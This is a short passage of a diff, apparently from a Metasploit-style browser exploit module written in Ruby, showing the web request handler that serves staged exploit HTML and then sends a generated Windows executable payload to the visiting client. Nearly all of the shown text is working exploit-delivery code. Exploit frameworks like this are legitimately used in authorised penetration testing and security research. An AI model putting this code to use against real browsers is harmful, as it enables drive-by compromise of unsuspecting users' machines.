+        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
481
+      elsif request.uri =~ /.*#{pm}.*$/
482
+        rq = "#{get_resource.chomp('/')}"
483
+        gm = stage2_html(rq)
484
+        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
485
+      elsif request.uri =~ /.*#{@payload_uri}$/
486
+        return if ((payload = regenerate_payload(cli)) == nil)
487
+        print_status("Sending payload ...")
488
+        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
489
+      else
490
+        print_status("Sending main page ..")
491
+        send_response(cli, exploit_html(request.uri))
492
+      end
493
+  end
494
+
495
+end
496
+
